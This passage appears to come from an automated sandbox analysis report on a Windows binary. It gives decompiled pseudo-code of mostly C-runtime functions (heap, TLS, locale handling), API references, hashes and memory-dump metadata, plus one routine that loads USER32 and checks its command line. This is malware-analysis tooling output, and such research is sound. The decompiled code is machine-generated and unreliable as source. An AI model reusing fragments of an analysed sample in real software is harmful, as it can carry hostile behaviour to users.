						 *(_t16 + 4) =  *(_t16 + 4) | 0xffffffff;
						 *_t16 = _t10;
					}
				}
				SetLastError(_t15);
				return _t16;
			}

0x004032d1
0x004032d9
0x004032dd
0x004032e8
0x004032ee
0x00403318
0x00403301
0x00403302
0x00403308
0x0040330e
0x00403312
0x00403312
0x004032ee
0x0040331f
0x00403329

APIs

GetLastError.KERNEL32(00000103,7FFFFFFF,00406D14,004063B3,00000000,?,?,00000000,00000001), ref: 004032C5
TlsGetValue.KERNEL32(?,?,00000000,00000001), ref: 004032D3
SetLastError.KERNEL32(00000000,?,?,00000000,00000001), ref: 0040331F

Part of subcall function 004057F5: HeapAlloc.KERNEL32(00000008,?,00000000,00000000,00000001,004032E8,00000001,00000074,?,?,00000000,00000001), ref: 004058EB

TlsSetValue.KERNEL32(00000000,?,?,00000000,00000001), ref: 004032F7
GetCurrentThreadId.KERNEL32 ref: 00403308

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: ErrorLastValue$AllocCurrentHeapThread
String ID:
API String ID: 2020098873-0
Opcode ID: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction ID: 899b35b84e4ab24c98c2b49143bd593f0914296a124979718cb125580a11fdc9
Opcode Fuzzy Hash: 0cd5b81671e5551e27e5e7f433cb1ce47f0171a5748ab77f5bca613d86b239ec
Instruction Fuzzy Hash: F6F09631900B219BD6312F75BF09B1A3E54AB417A2B11023EFD81B62E1CF788C01565D

Uniqueness

Uniqueness Score: -1.00%

Function 00406A8B, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 63%

			E00406A8B() {
				int _t41;
				int _t51;
				short* _t53;
				void* _t54;
				int _t59;
				void* _t60;
				short* _t62;

				_t62 =  *(_t60 - 0x18);
				 *(_t60 - 0x24) = 0;
				 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
				_t51 =  *(_t60 - 0x1c);
				if( *(_t60 - 0x24) == 0) {
					L8:
					_t41 = 0;
				} else {
					_t8 = _t60 + 0x14; // 0x406d69
					if(MultiByteToWideChar( *(_t60 + 0x20), 1,  *(_t60 + 0x10),  *_t8,  *(_t60 - 0x24), _t51) == 0) {
						goto L8;
					} else {
						_t59 = LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51, 0, 0);
						 *(_t60 - 0x28) = _t59;
						if(_t59 == 0) {
							goto L8;
						} else {
							if(( *(_t60 + 0xd) & 0x00000004) == 0) {
								 *(_t60 - 4) = 1;
								E004065A0(_t59 + _t59 + 0x00000003 & 0x000000fc, _t54);
								 *(_t60 - 0x18) = _t62;
								_t53 = _t62;
								 *(_t60 - 0x20) = _t53;
								 *(_t60 - 4) =  *(_t60 - 4) | 0xffffffff;
								if(_t53 == 0 || LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24),  *(_t60 - 0x1c), _t53, _t59) == 0) {
									goto L8;
								} else {
									_push(0);
									_push(0);
									if( *(_t60 + 0x1c) != 0) {
										_push( *(_t60 + 0x1c));
										_push( *(_t60 + 0x18));
									} else {
										_push(0);
										_push(0);
									}
									_t59 = WideCharToMultiByte( *(_t60 + 0x20), 0x220, _t53, _t59, ??, ??, ??, ??);
									if(_t59 == 0) {
										goto L8;
									} else {
										goto L17;
									}
								}
							} else {
								if( *(_t60 + 0x1c) == 0 || _t59 <=  *(_t60 + 0x1c) && LCMapStringW( *(_t60 + 8),  *(_t60 + 0xc),  *(_t60 - 0x24), _t51,  *(_t60 + 0x18),  *(_t60 + 0x1c)) != 0) {
									L17:
									_t41 = _t59;
								} else {
									goto L8;
								}
							}
						}
					}
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t60 - 0x10));
				return _t41;
			}

0x00406a8b
0x00406a90
0x00406a93
0x00406a97
0x00406a9d
0x00406b05
0x00406b05
0x00406a9f
0x00406aa3
0x00406ab6
0x00000000
0x00406ab8
0x00406aca
0x00406acc
0x00406ad1
0x00000000
0x00406ad3
0x00406ad7
0x00406b19
0x00406b28
0x00406b2d
0x00406b30
0x00406b32
0x00406b35
0x00406b4f
0x00000000
0x00406b69
0x00406b6c
0x00406b6d
0x00406b6e
0x00406b74
0x00406b77
0x00406b70
0x00406b70
0x00406b71
0x00406b71
0x00406b8a
0x00406b8e
0x00000000
0x00000000
0x00000000
0x00000000
0x00406b8e
0x00406ad9
0x00406adc
0x00406b94
0x00406b94
0x00000000
0x00000000
0x00000000
0x00406adc
0x00406ad7
0x00406ad1
0x00406ab6
0x00406b0d
0x00406b18

APIs

MultiByteToWideChar.KERNEL32(0000000A,00000001,?,?,00000000,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AAE
LCMapStringW.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AC4
LCMapStringW.KERNEL32(?,?,00000000,00000000,?,?,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406AF7
LCMapStringW.KERNEL32(?,?,00000000,?,?,00000000,?,?,00406D69,?,?,?,00000000,00000001), ref: 00406B5F
WideCharToMultiByte.KERNEL32(0000000A,00000220,?,00000000,?,?,00000000,00000000,?,00000000,?,?,00406D69,?), ref: 00406B84

Strings

im@, xrefs: 00406AA3

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: String$ByteCharMultiWide
String ID: im@
API String ID: 352835431-516455879
Opcode ID: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction ID: d30eb6b0ecd414d0393d87a1e30bb9d8f86802a40477592ed0a9063fd9cbcdab
Opcode Fuzzy Hash: 0c7727a35f3d2a6c64c548d4000b1fc14add49525af54c34e056693e9adbca60
Instruction Fuzzy Hash: 15112B72900119ABDF228F94CE04ADEBFB5FB48350F12416AF911B11A0D3369D61DF64

Uniqueness

Uniqueness Score: -1.00%

Function 00407314, Relevance: 6.5, APIs: 5, Instructions: 278
COMMON

Download Yara Rule

C-Code - Quality: 68%

			E00407314(void* _a4, long _a8) {
				signed int _v8;
				intOrPtr _v20;
				long _v36;
				void* _v40;
				intOrPtr _v44;
				char _v48;
				long _v52;
				long _v56;
				char _v60;
				intOrPtr _t56;
				void* _t57;
				long _t58;
				long _t59;
				long _t63;
				long _t66;
				long _t68;
				long _t71;
				long _t72;
				long _t74;
				long _t78;
				intOrPtr _t80;
				void* _t83;
				long _t85;
				long _t88;
				void* _t89;
				long _t91;
				intOrPtr _t93;
				void* _t97;
				void* _t104;
				long _t113;
				long _t116;
				intOrPtr _t122;
				void* _t123;

				_push(0xffffffff);
				_push(0x408710);
				_push(E00403E48);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t122;
				_t123 = _t122 - 0x28;
				_t97 = _a4;
				_t113 = 0;
				if(_t97 != 0) {
					_t116 = _a8;
					__eflags = _t116;
					if(_t116 != 0) {
						_t56 =  *0x40d528; // 0x1
						__eflags = _t56 - 3;
						if(_t56 != 3) {
							__eflags = _t56 - 2;
							if(_t56 != 2) {
								while(1) {
									_t57 = 0;
									__eflags = _t116 - 0xffffffe0;
									if(_t116 <= 0xffffffe0) {
										__eflags = _t116 - _t113;
										if(_t116 == _t113) {
											_t116 = 1;
										}
										_t116 = _t116 + 0x0000000f & 0xfffffff0;
										__eflags = _t116;
										_t57 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
									}
									__eflags = _t57 - _t113;
									if(_t57 != _t113) {
										goto L64;
									}
									__eflags =  *0x40d118 - _t113; // 0x0
									if(__eflags == 0) {
										goto L64;
									}
									_t58 = E0040535F(_t116);
									__eflags = _t58;
									if(_t58 != 0) {
										continue;
									}
									goto L63;
								}
								goto L64;
							}
							__eflags = _t116 - 0xffffffe0;
							if(_t116 <= 0xffffffe0) {
								__eflags = _t116;
								if(_t116 <= 0) {
									_t116 = 0x10;
								} else {
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
								}
								_a8 = _t116;
							}
							while(1) {
								_v40 = _t113;
								__eflags = _t116 - 0xffffffe0;
								if(_t116 <= 0xffffffe0) {
									E004052E9(9);
									_pop(_t104);
									_v8 = 1;
									_t63 = E00404E4F(_t97,  &_v60,  &_v48);
									_t123 = _t123 + 0xc;
									_t113 = _t63;
									_v52 = _t113;
									__eflags = _t113;
									if(_t113 == 0) {
										_v40 = HeapReAlloc( *0x40d524, 0, _t97, _t116);
									} else {
										__eflags = _t116 -  *0x40c26c; // 0x1e0
										if(__eflags < 0) {
											_t100 = _t116 >> 4;
											_t71 = E00405217(_t104, _v60, _v48, _t113, _t116 >> 4);
											_t123 = _t123 + 0x10;
											__eflags = _t71;
											if(_t71 == 0) {
												_t72 = E00404EEB(_t104, _t100);
												_v40 = _t72;
												__eflags = _t72;
												if(_t72 != 0) {
													_t74 = ( *_t113 & 0x000000ff) << 4;
													_v56 = _t74;
													__eflags = _t74 - _t116;
													if(_t74 >= _t116) {
														_t74 = _t116;
													}
													E00405EB0(_v40, _a4, _t74);
													E00404EA6(_v60, _v48, _t113);
													_t123 = _t123 + 0x18;
												}
											} else {
												_v40 = _a4;
											}
											_t97 = _a4;
										}
										__eflags = _v40;
										if(_v40 == 0) {
											_t66 = HeapAlloc( *0x40d524, 0, _t116);
											_v40 = _t66;
											__eflags = _t66;
											if(_t66 != 0) {
												_t68 = ( *_t113 & 0x000000ff) << 4;
												_v56 = _t68;
												__eflags = _t68 - _t116;
												if(_t68 >= _t116) {
													_t68 = _t116;
												}
												E00405EB0(_v40, _t97, _t68);
												E00404EA6(_v60, _v48, _t113);
												_t123 = _t123 + 0x18;
											}
										}
									}
									_t51 =  &_v8;
									 *_t51 = _v8 | 0xffffffff;
									__eflags =  *_t51;
									E004075ED();
								}
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								_t59 = E0040535F(_t116);
								__eflags = _t59;
								if(_t59 != 0) {
									continue;
								}
								goto L63;
							}
							goto L64;
						} else {
							goto L5;
						}
						do {
							L5:
							_v40 = _t113;
							__eflags = _t116 - 0xffffffe0;
							if(_t116 > 0xffffffe0) {
								L25:
								_t57 = _v40;
								__eflags = _t57 - _t113;
								if(_t57 != _t113) {
									goto L64;
								}
								__eflags =  *0x40d118 - _t113; // 0x0
								if(__eflags == 0) {
									goto L64;
								}
								goto L27;
							}
							E004052E9(9);
							_v8 = _t113;
							_t80 = E004040F4(_t97);
							_v44 = _t80;
							__eflags = _t80 - _t113;
							if(_t80 == _t113) {
								L21:
								_v8 = _v8 | 0xffffffff;
								E0040749F();
								__eflags = _v44 - _t113;
								if(_v44 == _t113) {
									__eflags = _t116 - _t113;
									if(_t116 == _t113) {
										_t116 = 1;
									}
									_t116 = _t116 + 0x0000000f & 0xfffffff0;
									__eflags = _t116;
									_a8 = _t116;
									_v40 = HeapReAlloc( *0x40d524, _t113, _t97, _t116);
								}
								goto L25;
							}
							__eflags = _t116 -  *0x40d520; // 0x0
							if(__eflags <= 0) {
								_push(_t116);
								_push(_t97);
								_push(_t80);
								_t88 = E004048FD();
								_t123 = _t123 + 0xc;
								__eflags = _t88;
								if(_t88 == 0) {
									_push(_t116);
									_t89 = E00404448();
									_v40 = _t89;
									__eflags = _t89 - _t113;
									if(_t89 != _t113) {
										_t91 =  *((intOrPtr*)(_t97 - 4)) - 1;
										_v36 = _t91;
										__eflags = _t91 - _t116;
										if(_t91 >= _t116) {
											_t91 = _t116;
										}
										E00405EB0(_v40, _t97, _t91);
										_t93 = E004040F4(_t97);
										_v44 = _t93;
										_push(_t97);
										_push(_t93);
										E0040411F();
										_t123 = _t123 + 0x18;
									}
								} else {
									_v40 = _t97;
								}
							}
							__eflags = _v40 - _t113;
							if(_v40 == _t113) {
								__eflags = _t116 - _t113;
								if(_t116 == _t113) {
									_t116 = 1;
									_a8 = _t116;
								}
								_t116 = _t116 + 0x0000000f & 0xfffffff0;
								_a8 = _t116;
								_t83 = HeapAlloc( *0x40d524, _t113, _t116);
								_v40 = _t83;
								__eflags = _t83 - _t113;
								if(_t83 != _t113) {
									_t85 =  *((intOrPtr*)(_t97 - 4)) - 1;
									_v36 = _t85;
									__eflags = _t85 - _t116;
									if(_t85 >= _t116) {
										_t85 = _t116;
									}
									E00405EB0(_v40, _t97, _t85);
									_push(_t97);
									_push(_v44);
									E0040411F();
									_t123 = _t123 + 0x14;
								}
							}
							goto L21;
							L27:
							_t78 = E0040535F(_t116);
							__eflags = _t78;
						} while (_t78 != 0);
						goto L63;
					} else {
						E004027C7(_t97);
						L63:
						_t57 = 0;
						__eflags = 0;
						goto L64;
					}
				} else {
					_t57 = E004028B0(_a8);
					L64:
					 *[fs:0x0] = _v20;
					return _t57;
				}
			}

0x00407317
0x00407319
0x0040731e
0x00407329
0x0040732a
0x00407331
0x00407337
0x0040733a
0x0040733e
0x0040734e
0x00407351
0x00407353
0x00407361
0x00407366
0x00407369
0x004074a8
0x004074ab
0x004075f8
0x004075f8
0x004075fa
0x004075fd
0x004075ff
0x00407601
0x00407605
0x00407605
0x00407609
0x00407609
0x00407615
0x00407615
0x0040761b
0x0040761d
0x00000000
0x00000000
0x0040761f
0x00407625
0x00000000
0x00000000
0x00407628
0x0040762e
0x00407630
0x00000000
0x00000000
0x00000000
0x00407630
0x00000000
0x004075f8
0x004074b1
0x004074b4
0x004074b6
0x004074b8
0x004074c4
0x004074ba
0x004074bd
0x004074bd
0x004074c5
0x004074c5
0x004074c8
0x004074c8
0x004074cb
0x004074ce
0x004074d6
0x004074db
0x004074dc
0x004074ec
0x004074f1
0x004074f4
0x004074f6
0x004074f9
0x004074fb
0x004075bb
0x00407501
0x00407501
0x00407507
0x0040750b
0x00407516
0x0040751b
0x0040751e
0x00407520
0x0040752b
0x00407531
0x00407534
0x00407536
0x0040753b
0x0040753e
0x00407541
0x00407543
0x00407545
0x00407545
0x0040754e
0x0040755a
0x0040755f
0x0040755f
0x00407522
0x00407525
0x00407525
0x00407562
0x00407562
0x00407565
0x00407569
0x00407574
0x0040757a
0x0040757d
0x0040757f
0x00407584
0x00407587
0x0040758a
0x0040758c
0x0040758e
0x0040758e
0x00407595
0x004075a1
0x004075a6
0x004075a6
0x0040757f
0x00407569
0x004075be
0x004075be
0x004075be
0x004075c2
0x004075c2
0x004075c7
0x004075ca
0x004075cc
0x00000000
0x00000000
0x004075ce
0x004075d4
0x00000000
0x00000000
0x004075d7
0x004075dd
0x004075df
0x00000000
0x00000000
0x00000000
0x004075e5
0x00000000
0x00000000
0x00000000
0x00000000
0x0040736f
0x0040736f
0x0040736f
0x00407372
0x00407375
0x0040746c
0x0040746c
0x0040746f
0x00407471
0x00000000
0x00000000
0x00407477
0x0040747d
0x00000000
0x00000000
0x00000000
0x0040747d
0x0040737d
0x00407383
0x00407387
0x0040738d
0x00407390
0x00407392
0x0040743c
0x0040743c
0x00407440
0x00407445
0x00407448
0x0040744a
0x0040744c
0x00407450
0x00407450
0x00407454
0x00407454
0x00407457
0x00407469
0x00407469
0x00000000
0x00407448
0x00407398
0x0040739e
0x004073a0
0x004073a1
0x004073a2
0x004073a3
0x004073a8
0x004073ab
0x004073ad
0x004073b4
0x004073b5
0x004073bb
0x004073be
0x004073c0
0x004073c5
0x004073c6
0x004073c9
0x004073cb
0x004073cd
0x004073cd
0x004073d4
0x004073da
0x004073df
0x004073e2
0x004073e3
0x004073e4
0x004073e9
0x004073e9
0x004073af
0x004073af
0x004073af
0x004073ad
0x004073ec
0x004073ef
0x004073f1
0x004073f3
0x004073f7
0x004073f8
0x004073f8
0x004073fe
0x00407401
0x0040740c
0x00407412
0x00407415
0x00407417
0x0040741c
0x0040741d
0x00407420
0x00407422
0x00407424
0x00407424
0x0040742b
0x00407430
0x00407431
0x00407434
0x00407439
0x00407439
0x00407417
0x00000000
0x00407483
0x00407484
0x0040748a
0x0040748a
0x00000000
0x00407355
0x00407356
0x00407632
0x00407632
0x00407632
0x00000000
0x00407632
0x00407340
0x00407343
0x00407634
0x00407637
0x00407642
0x00407642

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 426e0727b230dc93b3f49126c5ba8127f8670404dcc77d790de6bbab12a94222
Instruction ID: e74df424e18119bee13a882b703a49c143398902d29401a67f721a1b3ed60ce3
Opcode Fuzzy Hash: 426e0727b230dc93b3f49126c5ba8127f8670404dcc77d790de6bbab12a94222
Instruction Fuzzy Hash: 98914771C05514AEDB11AB68CD819DF7EB8EB44360F20013BFC54B62D1D639AD40CAAE

Uniqueness

Uniqueness Score: -1.00%

Function 00404BF3, Relevance: 6.4, APIs: 5, Instructions: 102
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00404BF3() {
				void* _t25;
				intOrPtr* _t28;
				void* _t42;
				void* _t43;
				void* _t45;
				void* _t55;

				if( *0x40a258 != 0xffffffff) {
					_t43 = HeapAlloc( *0x40d524, 0, 0x2020);
					if(_t43 == 0) {
						goto L20;
					}
					goto L3;
				} else {
					_t43 = 0x40a248;
					L3:
					_t42 = VirtualAlloc(0, 0x400000, 0x2000, 4);
					if(_t42 == 0) {
						L18:
						if(_t43 != 0x40a248) {
							HeapFree( *0x40d524, 0, _t43);
						}
						L20:
						return 0;
					}
					if(VirtualAlloc(_t42, 0x10000, 0x1000, 4) == 0) {
						VirtualFree(_t42, 0, 0x8000);
						goto L18;
					}
					if(_t43 != 0x40a248) {
						 *_t43 = 0x40a248;
						_t25 =  *0x40a24c; // 0x40a248
						 *(_t43 + 4) = _t25;
						 *0x40a24c = _t43;
						 *( *(_t43 + 4)) = _t43;
					} else {
						if( *0x40a248 == 0) {
							 *0x40a248 = 0x40a248;
						}
						if( *0x40a24c == 0) {
							 *0x40a24c = 0x40a248;
						}
					}
					_t3 = _t42 + 0x400000; // 0x400000
					_t4 = _t43 + 0x98; // 0x98
					 *((intOrPtr*)(_t43 + 0x14)) = _t3;
					_t6 = _t43 + 0x18; // 0x18
					_t28 = _t6;
					 *((intOrPtr*)(_t43 + 0xc)) = _t4;
					 *(_t43 + 0x10) = _t42;
					 *((intOrPtr*)(_t43 + 8)) = _t28;
					_t45 = 0;
					do {
						_t55 = _t45 - 0x10;
						_t45 = _t45 + 1;
						 *_t28 = ((0 | _t55 >= 0x00000000) - 0x00000001 & 0x000000f1) - 1;
						 *((intOrPtr*)(_t28 + 4)) = 0xf1;
						_t28 = _t28 + 8;
					} while (_t45 < 0x400);
					E00406760(_t42, 0, 0x10000);
					while(_t42 <  *(_t43 + 0x10) + 0x10000) {
						 *(_t42 + 0xf8) =  *(_t42 + 0xf8) | 0x000000ff;
						_t16 = _t42 + 8; // -4088
						 *_t42 = _t16;
						 *((intOrPtr*)(_t42 + 4)) = 0xf0;
						_t42 = _t42 + 0x1000;
					}
					return _t43;
				}
			}

0x00404bfe
0x00404c1a
0x00404c1e
0x00000000
0x00000000
0x00000000
0x00404c00
0x00404c00
0x00404c24
0x00404c3a
0x00404c3e
0x00404d19
0x00404d1f
0x00404d2a
0x00404d2a
0x00404d30
0x00000000
0x00404d30
0x00404c56
0x00404d13
0x00000000
0x00404d13
0x00404c63
0x00404c83
0x00404c85
0x00404c8a
0x00404c8d
0x00404c96
0x00404c65
0x00404c6c
0x00404c6e
0x00404c6e
0x00404c7a
0x00404c7c
0x00404c7c
0x00404c7a
0x00404c98
0x00404c9e
0x00404ca4
0x00404ca7
0x00404ca7
0x00404caa
0x00404cad
0x00404cb0
0x00404cb3
0x00404cba
0x00404cbc
0x00404cc6
0x00404cc7
0x00404cc9
0x00404ccc
0x00404ccf
0x00404cdb
0x00404ce3
0x00404cec
0x00404cf3
0x00404cf6
0x00404cf8
0x00404cff
0x00404cff
0x00000000
0x00404d07

APIs

HeapAlloc.KERNEL32(00000000,00002020,0040A248,0040A248,?,?,004050BF,00000000,00000010,00000000,00000009,00000009,?,0040299A,00000010,00000000), ref: 00404C14
VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,?,004050BF,00000000,00000010,00000000,00000009,00000009,?,0040299A,00000010,00000000), ref: 00404C38
VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,?,004050BF,00000000,00000010,00000000,00000009,00000009,?,0040299A,00000010,00000000), ref: 00404C52
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,004050BF,00000000,00000010,00000000,00000009,00000009,?,0040299A,00000010,00000000,?), ref: 00404D13
HeapFree.KERNEL32(00000000,00000000,?,?,004050BF,00000000,00000010,00000000,00000009,00000009,?,0040299A,00000010,00000000,?,00000000), ref: 00404D2A

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: AllocVirtual$FreeHeap
String ID:
API String ID: 714016831-0
Opcode ID: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction ID: b0cfa0340c63db5bdd4edf7706b95417e2550fa6306714a3c0f782df23cf66d2
Opcode Fuzzy Hash: a139a282fdaf2165f2bfe5b1244df2dd12f90868bacabd89215c1e8c5bc2e03b
Instruction Fuzzy Hash: 993100B1601701AFE3308F28ED44B22B7E0EB85759F12863EE655B73E0D779A8448B5D

Uniqueness

Uniqueness Score: -1.00%

Function 00405D0E, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 124
COMMON

Download Yara Rule

C-Code - Quality: 92%

			E00405D0E(void* __ebx, void* __edi) {
				char _v17;
				signed char _v18;
				struct _cpinfo _v24;
				char _v280;
				char _v536;
				char _v792;
				char _v1304;
				void* _t43;
				char _t44;
				signed char _t45;
				void* _t55;
				signed int _t56;
				signed char _t64;
				intOrPtr* _t66;
				signed int _t68;
				signed int _t70;
				signed int _t71;
				signed char _t76;
				signed char _t77;
				signed char* _t78;
				void* _t81;
				void* _t87;
				void* _t88;

				if(GetCPInfo( *0x40d2d0,  &_v24) == 1) {
					_t44 = 0;
					do {
						 *((char*)(_t87 + _t44 - 0x114)) = _t44;
						_t44 = _t44 + 1;
					} while (_t44 < 0x100);
					_t45 = _v18;
					_v280 = 0x20;
					if(_t45 == 0) {
						L9:
						E00406BC6(1,  &_v280, 0x100,  &_v1304,  *0x40d2d0,  *0x40d504, 0);
						E00406977( *0x40d504, 0x100,  &_v280, 0x100,  &_v536, 0x100,  *0x40d2d0, 0);
						E00406977( *0x40d504, 0x200,  &_v280, 0x100,  &_v792, 0x100,  *0x40d2d0, 0);
						_t55 = 0;
						_t66 =  &_v1304;
						do {
							_t76 =  *_t66;
							if((_t76 & 0x00000001) == 0) {
								if((_t76 & 0x00000002) == 0) {
									 *(_t55 + 0x40d300) =  *(_t55 + 0x40d300) & 0x00000000;
									goto L16;
								}
								 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000020;
								_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x314));
								L12:
								 *(_t55 + 0x40d300) = _t77;
								goto L16;
							}
							 *(_t55 + 0x40d401) =  *(_t55 + 0x40d401) | 0x00000010;
							_t77 =  *((intOrPtr*)(_t87 + _t55 - 0x214));
							goto L12;
							L16:
							_t55 = _t55 + 1;
							_t66 = _t66 + 2;
						} while (_t55 < 0x100);
						return _t55;
					}
					_t78 =  &_v17;
					do {
						_t68 =  *_t78 & 0x000000ff;
						_t56 = _t45 & 0x000000ff;
						if(_t56 <= _t68) {
							_t81 = _t87 + _t56 - 0x114;
							_t70 = _t68 - _t56 + 1;
							_t71 = _t70 >> 2;
							memset(_t81 + _t71, memset(_t81, 0x20202020, _t71 << 2), (_t70 & 0x00000003) << 0);
							_t88 = _t88 + 0x18;
						}
						_t78 =  &(_t78[2]);
						_t45 =  *((intOrPtr*)(_t78 - 1));
					} while (_t45 != 0);
					goto L9;
				}
				_t43 = 0;
				do {
					if(_t43 < 0x41 || _t43 > 0x5a) {
						if(_t43 < 0x61 || _t43 > 0x7a) {
							 *(_t43 + 0x40d300) =  *(_t43 + 0x40d300) & 0x00000000;
						} else {
							 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000020;
							_t64 = _t43 - 0x20;
							goto L22;
						}
					} else {
						 *(_t43 + 0x40d401) =  *(_t43 + 0x40d401) | 0x00000010;
						_t64 = _t43 + 0x20;
						L22:
						 *(_t43 + 0x40d300) = _t64;
					}
					_t43 = _t43 + 1;
				} while (_t43 < 0x100);
				return _t43;
			}

0x00405d2b
0x00405d31
0x00405d38
0x00405d38
0x00405d3f
0x00405d40
0x00405d44
0x00405d47
0x00405d50
0x00405d89
0x00405da8
0x00405dcc
0x00405df4
0x00405dfc
0x00405dfe
0x00405e04
0x00405e04
0x00405e0a
0x00405e25
0x00405e37
0x00000000
0x00405e37
0x00405e27
0x00405e2e
0x00405e1a
0x00405e1a
0x00000000
0x00405e1a
0x00405e0c
0x00405e13
0x00000000
0x00405e3e
0x00405e3e
0x00405e40
0x00405e41
0x00000000
0x00405e04
0x00405d54
0x00405d57
0x00405d57
0x00405d5a
0x00405d5f
0x00405d63
0x00405d6a
0x00405d72
0x00405d7c
0x00405d7c
0x00405d7c
0x00405d7f
0x00405d80
0x00405d83
0x00000000
0x00405d88
0x00405e47
0x00405e4e
0x00405e51
0x00405e6f
0x00405e84
0x00405e76
0x00405e76
0x00405e7f
0x00000000
0x00405e7f
0x00405e58
0x00405e58
0x00405e61
0x00405e64
0x00405e64
0x00405e64
0x00405e8b
0x00405e8c
0x00405e92

APIs

GetCPInfo.KERNEL32(?), ref: 00405D22

Strings

, xrefs: 00405D47
, xrefs: 00405D6B

Memory Dump Source

Source File: 00000000.00000002.199766581.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.199762788.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199773116.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.199778321.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199781770.000000000040C000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.199786237.000000000040E000.00000002.00020000.sdmp Download File

Similarity

API ID: Info
String ID: $
API String ID: 1807457897-3032137957
Opcode ID: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction ID: fa81978c2c9292851a2326c8806dd66da50f431c33137cac09d58c8afb8690e9
Opcode Fuzzy Hash: 91c6b86bf0cdd0c0f68328bb78e02530c482df04dcf8c73d0c98ddc2f6aa9794
Instruction Fuzzy Hash: 994118314046981EEB1587A4DE59BFB7F98DB02744F1400F6D589FA1D2C2394A49CFAA

Uniqueness

Uniqueness Score: -1.00%

Function 00401F50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30
libraryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F50(void* __eflags) {
				short _v520;
				intOrPtr _v524;
				intOrPtr _t7;
				CHAR* _t14;

				 *_t14 = 0x52455355;
				_v524 = 0x3233;
				 *0x40cf50 = LoadLibraryA(_t14);
				E00401ED0();
				_t7 =  *0x40cf48; // 0x0
				if(_t7 != 0) {
					L3:
					return 0;
				} else {
					GetModuleFileNameW(0,  &_v520, 0x208);
					if(E004018A0( &_v520, L"-a", 1) == 0) {
						goto L3;
					} else {
						return 1;
					}
				}
			}

0x00401f5a
0x00401f63
0x00401f71
0x00401f76
0x00401f7b
0x00401f82
0x00401fba
0x00401fc2
0x00401f84
0x00401f90
0x00401fac
0x00000000
0x00401fae
0x00401fb9
0x00401fb9
0x00401fac

APIs

LoadLibraryA.KERNEL32 ref: 00401F6B

Part of subcall function 00401ED0: GetProcAddress.KERNEL32 ref: 00401EF8
Part of subcall function 00401ED0: GetConsoleWindow.KERNELBASE ref: 00401F39

GetModuleFileNameW.KERNEL32(00000000,00003233,00000208), ref: 00401F90

